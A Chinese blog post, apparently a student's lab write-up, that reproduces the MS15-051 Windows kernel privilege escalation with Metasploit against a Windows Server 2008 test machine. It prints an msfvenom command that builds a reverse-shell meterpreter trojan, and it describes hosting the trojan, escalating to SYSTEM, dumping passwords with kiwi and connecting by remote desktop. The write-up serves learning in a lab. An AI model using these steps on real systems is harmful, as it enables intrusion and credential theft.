ms15-051提权实验复现


这是我在实验室学习渗透测试的第三个实验,用了大概三个小时完成的,明显越来越熟练了。尽管里面很多原理还并不太清楚,但随着做的漏洞复现越来越多,知道的东西也随之增加。

另外,今天也学到了markdown中的注释语法:

[^_^]: 要注释的句子

您看这个表情可不可爱?

好了,废话不多说,我们进入正题。本博客记录了我进行ms15-051提权实验复现的全过程。

前言

Metasploit

Metasploit是一款开源的渗透测试工具,可以帮助安全员发现漏洞问题,此工具带有的攻击模块可以帮助安全员简单的利用相关的漏洞。

实验目的

本实验通过Metasploit对内网机器进行渗透,并且使用ms15-051进行权限提升,获取Window Server 2008的SYSTEM权限,最后进行远程控制。

实验原理

Metasploit框架使Metasploit具有良好的扩展性,它的控制接口负责发现漏洞、攻击漏洞、提交漏洞,然后通过一些接口加入攻击后处理工具和报表工具。Metasploit框架可以从一个漏洞扫描程序导入数据,使用关于有漏洞主机的详细信息来发现可攻击漏洞,然后使用有效载荷对系统发起攻击。所有这些操作都可以通过Metasploit的Web界面进行管理,而它只是其中一种管理接口,另外还有命令行工具和一些商业工具等。攻击者可以将漏洞扫描程序的结果导入到Metasploit框架的开源安全工具Armitage中,然后通过Metasploit的模块来确定漏洞。一旦发现了漏洞,攻击者就可以采取一种可行方法攻击系统,通过Shell或启动Metasploit的meterpreter来控制这个系统。这些有效载荷就是在获得本地系统访问后执行的一系列命令。这个过程需要参考一些文档并使用一些数据库技术,在发现漏洞之后开发一种可行的攻击方法,其中有效载荷数据库包含用于提取本地系统密码、安装其他软件或控制硬件等的模块,这些功能很象以前BO2K等工具所具备的功能。

漏洞CVE-2015-1701

受影响的系统:

  • Windows Vista
  • WIndows Server 2012 R2
  • WIndows Server 2012
  • WIndows Server 2008 R2
  • WIndows Server 2008
  • WIndows Server 2003
  • WIndows RT 8.1
  • Windows RT
  • Windows 8.1
  • Windows 8
  • Windows 7

漏洞成因:Win32.k.sys内核模式驱动程序没有正确处理内存对象,在实现上存在权限提升漏洞

漏洞危害:成功利用此漏洞可使攻击者在内核模式中运行任意代码。

漏洞利用:攻击者必须具有有效的登陆凭证,并且可以本地登录以利用此漏洞。

实验环境

攻击机:Kali Linux

靶机:Windows Server 2008

实验步骤

  1. 使用msfvenom生成木马
msfvenom -p windows/meterpreter/reverse_tcp lhost=攻击机IP lport=4444 -f exe > shell.exe
  1. 安装xampp,并启动。(我安装在了/opt下)
  1. 把生成的木马挂在服务器上等待靶机下载

    在opt/lampp/htdocs/下创建目录shell,提升shell及其所有文件和子目录的权限为所有人可读可写可执行。chmod命令用法

  2. 把生成的木马复制到网站目录

  3. 使用msf的handler模块

  4. 设置payload及其参数

    payload要和木马的payload一致(即windows/meterpreter/reverse_tcp)

  1. 重新启动网站

    不要关闭原来的终端,新建终端,重新启动网站。

  1. 打开靶机windows server 2008,访问http://攻击机IP/shell,下载木马shell.exe(先将该网站加入受信任的站点)。下载完成后,运行。
  1. 返回攻击机,已成功获取靶机的shell,getuid可查看当前权限
  1. 使用ms15-051漏洞,进一步获取system更高权限

    首先输入backgroud,把会话切换进后台,之后:

    ^_^:

  2. 设置payload及其参数

    ^_^:

  3. 键入run以攻击,getuid以并查看当前权限。

    ^_^:

    攻击成功,并且当前已是SYSTEM用户。靶机的IP地址为192.168.227.130(后面要用)。

  4. 加载kiwi,获取用户密码

    如果是windows server 2003,则加载mimikatz,因为我用的靶机为windows server 2008,因此需要用kiwi。其他系统你可以先加载mimikatz,根据提示选择你要加载什么(下图中,我最先加载的是mimikatz,它提示我应该使用kiwi来代替)。

    ^_^:

    因为我没有给用户设置密码,所以Password一列均为空(这里其实需要设置密码的,后面会讲到)。

  5. 远程连接靶机

    首先在windows server 2008进行如下设置,允许运行任意版本远程桌面的计算机连接。

    ^_^:

    然后回到攻击机,新建一个终端,输入rdesktop 靶机IP,远程连接靶机。

    ^_^:

    由于rdesktop不支持无密码登录,因此我此时并不能使用用户名zxy登录。所以只能先返回windows,在服务管理器中为用户名为zxy的用户设置密码。

    ^_^:

    再次返回攻击机,使用rdesktop命令远程连接主机,点击“其他用户”,输入用户名zxy和刚刚设置的密码后,连接成功:

    ^_^:

  6. 成功入侵靶机,查看IP和用户。

    ^_^:


文章作者: 恰醋
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 恰醋 !
评论
  目录